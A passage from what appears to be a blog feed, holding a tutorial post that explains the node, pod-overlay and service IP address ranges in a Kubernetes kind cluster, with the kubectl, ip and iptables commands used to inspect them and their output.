others.</p> Thu, 07 Nov 2024 12:00:00 +0000 https://raesene.github.io/blog/2024/11/07/Exploring-a-basic-Kubernetes-Network-Plugin/ https://raesene.github.io/blog/2024/11/07/Exploring-a-basic-Kubernetes-Network-Plugin/ The Many IP Addresses of Kubernetes <p>When getting to grips with Kubernetes one of the more complex concepts to understand is … all the IP addresses! Even looking at a simple cluster setup, you’ll get addresses in multiple different ranges. So this is a quick post to walk through where they’re coming from and what they’re used for.</p> <p>Typically you can see at least three distinct ranges of IP addresses in a Kubernetes cluster, although this can vary depending on the distribution and container networking solution in place. Firstly there is the node network where the container, virtual machines or physical servers running the Kubernetes components are, then there is an overlay network where pods are assigned IP addresses and lastly another network range where Kubernetes services are located.</p> <p>We’ll start with a standard <a href="https://kind.sigs.k8s.io/">kind</a> cluster before talking about some other sources of IP address complexity. We’ll start by running <code class="language-plaintext highlighter-rouge">kind create cluster</code> to get it up and running.</p> <p>Once we’ve got the cluster started we can see what IP address the node has by running <code class="language-plaintext highlighter-rouge">docker exec -it kind-control-plane ip addr show dev eth0</code> . The output of that command should look something like this</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>13: eth0@if14: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP group default <span class="nb">link</span>/ether 02:42:ac:12:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet 172.18.0.2/16 brd 172.18.255.255 scope global eth0 valid_lft forever preferred_lft forever inet6 fc00:f853:ccd:e793::2/64 scope global nodad valid_lft forever preferred_lft forever inet6 fe80::42:acff:fe12:2/64 scope <span class="nb">link </span>valid_lft forever preferred_lft forever </code></pre></div></div> <p>We can see that the address assigned is <code class="language-plaintext highlighter-rouge">172.18.0.2/16</code>, which is a network controlled by Docker (as we’re running our cluster on top of Docker). If you have a Virtual machine or physical server the IP addresses will be in whatever range is assigned to the network(s) the host has.</p> <p>So far, so simple. Now lets add a workload to our cluster and see what addresses are assigned there. Let’s start a webserver workload with <code class="language-plaintext highlighter-rouge">kubectl run webserver --image=nginx</code>. Once that pod starts we can run <code class="language-plaintext highlighter-rouge">kubectl get pods webserver -o wide</code> to see what IP address has been assigned to the pod.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES webserver 1/1 Running 0 42s 10.244.0.5 kind-control-plane &lt;none&gt; &lt;none&gt; </code></pre></div></div> <p>Our pod has an IP address of <code class="language-plaintext highlighter-rouge">10.244.0.5</code> which is in an entirely different subnet! This IP address is part of the overlay network that most (but not all) Kubernetes distributions use for their workloads. This subnet is generally automatically assigned by the Kubernetes <a href="https://kubernetes.io/docs/concepts/extend-kubernetes/compute-storage-net/network-plugins/">network plugin</a> used in the cluster, so it’ll change based on the plugin in use and any specific configuration for that plugin. What’s happening here is that our Kubernetes node has created an <code class="language-plaintext highlighter-rouge">veth</code> interface for our pod and assigned that address to it. We can see the pod IP addresses from the hosts perspective by running <code class="language-plaintext highlighter-rouge">docker exec kind-control-plane ip route</code> and we can see the IP addresses assigned to the different pods in the cluster, including the IP address we saw from our <code class="language-plaintext highlighter-rouge">get pods</code> command above.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>default via 172.18.0.1 dev eth0 10.244.0.2 dev veth9ee91973 scope host 10.244.0.3 dev veth1b82cd96 scope host 10.244.0.4 dev veth38302a10 scope host 10.244.0.5 dev vethf915cecb scope host 172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.2 </code></pre></div></div> <p>Now we’ve got the node network and the pod network, let’s see what happens if we add a Kubernetes <a href="https://kubernetes.io/docs/concepts/services-networking/service/">service</a> to the mix. We can do this by running <code class="language-plaintext highlighter-rouge">kubectl expose pod webserver --port 8080</code> which will create a service object for our webserver pod. There are several types of service object, but by default a ClusterIP service will be created, which provides an IP address which is visible inside the cluster, but not outside it. Once our service is created we can look at the IP address by running <code class="language-plaintext highlighter-rouge">kubectl get services webserver</code></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE webserver ClusterIP 10.96.198.83 &lt;none&gt; 8080/TCP 97s </code></pre></div></div> <p>We can see from the output that the IP address is <code class="language-plaintext highlighter-rouge">10.96.198.83</code> another IP address range! This range is set by a command line flag on the Kubernetes API server. In the case of our kind cluster, it looks like this <code class="language-plaintext highlighter-rouge">--service-cluster-ip-range=10.96.0.0/16</code>.</p> <p>But from a host perspective, where does this IP address fit in. Well the reality of Kubernetes service objects is that, by default, they’re iptables rules created by the <code class="language-plaintext highlighter-rouge">kube-proxy</code> service on the node. We can see our webserver service by running this command <code class="language-plaintext highlighter-rouge">docker exec kind-control-plane iptables -t nat -L KUBE-SERVICES -v -n --line-numbers</code></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Chain KUBE-SERVICES (2 references) num pkts bytes target prot opt in out source destination 1 1 60 KUBE-SVC-NPX46M4PTMTKRN6Y 6 -- * * 0.0.0.0/0 10.96.0.1 /* default/kubernetes:https cluster IP */ tcp dpt:443 2 0 0 KUBE-SVC-UMJOY2TYQGVV2BKY 6 -- * * 0.0.0.0/0 10.96.198.83 /* default/webserver cluster IP */ tcp dpt:8080 3 0 0 KUBE-SVC-TCOU7JCQXEZGVUNU 17 -- * * 0.0.0.0/0 10.96.0.10 /* kube-system/kube-dns:dns cluster IP */ udp dpt:53 4 0 0 KUBE-SVC-ERIFXISQEP7F7OF4 6 -- * * 0.0.0.0/0 10.96.0.10 /* kube-system/kube-dns:dns-tcp cluster IP */ tcp dpt:53 5 0 0 KUBE-SVC-JD5MR3NA4I4DYORP 6 -- * * 0.0.0.0/0 10.96.0.10 /* kube-system/kube-dns:metrics cluster IP */ tcp dpt:9153 6 7757 465K KUBE-NODEPORTS 0 -- * * 0.0.0.0/0 0.0.0.0/0 /* kubernetes service nodeports; NOTE: this must be the last rule in this chain */ ADDRTYPE match dst-type LOCAL </code></pre></div></div> <h2 id="conclusion">Conclusion</h2> <p>The goal of this post was just to explore a couple of concepts. Firstly, the variety of IP addresses you’re likely to see in a Kubernetes cluster and then how those tie to the operating system level.</p> Fri, 01 Nov 2024 08:00:00 +0000 https://raesene.github.io/blog/2024/11/01/The-Many-IP-Addresses-Of-Kubernetes/ https://raesene.github.io/blog/2024/11/01/The-Many-IP-Addresses-Of-Kubernetes/